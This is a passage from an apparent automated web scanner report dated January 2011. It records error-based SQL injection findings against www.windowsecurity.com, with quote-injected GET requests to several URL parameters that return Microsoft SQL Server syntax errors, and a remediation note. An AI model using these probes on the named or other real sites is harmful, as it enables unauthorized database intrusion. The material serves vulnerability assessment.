Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=DPJAFEIDKNHIPEEMEGKFHPDE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h'/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=JPJAFEIDLNFHIDGFKDFNDLJA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h''/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=NPJAFEIDEPBPPNALIPPFNCKH; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 7, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447'/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=EAKAFEIDLBCKELLDKFIAEENB; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447''/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=HAKAFEIDOELAKCPOHOGPEJHI; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 8, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w'/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=LAKAFEIDPAPABHLIOPIBPDOG; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w''/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=OAKAFEIDPMAPHHMFFHODDINO; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565'/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=BBKAFEIDKNFEDBEBINKDKJBO; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565''/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=FBKAFEIDOBIKBKFKGJDFMHBJ; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
1.33. http://www.windowsecurity.com/articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images?1'=1 HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23740 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=IJJAFEIDCAJLHBAMNPIIHFOB; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near '='.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images?1''=1 HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=NJJAFEIDAPCNELDFOKKDINGG; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 10 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 10, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz'/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=JBKAFEIDBDLFLFFDAAOOPKGM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz''/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=GCKAFEIDAAIAOENOADHOKBMM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 11 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 11, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49'/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=MCKAFEIDEBABHBMCPMOANGNN; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49''/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=PCKAFEIDAEJIHPHNABKECFCL; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 12 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 12, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl'/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=IDKAFEIDOGDCKMKAABPPOOOH; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl''/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=LDKAFEIDHEKBJHFJBCHPPDKF; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 13 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 13, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den'/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=PDKAFEIDCOALBJKPLNLOHKAF; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den''/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=DEKAFEIDNNKBKHABNKGIICNK; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 14 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 14, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start'/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=HEKAFEIDGNFBLCMCMFJFMEMM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start''/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=MEKAFEIDHGIPJPODEPPLEHAI; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 15 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 15, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15'/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=PEKAFEIDCEOBFLEABBDHHJOE; path=/ Cache-control: private
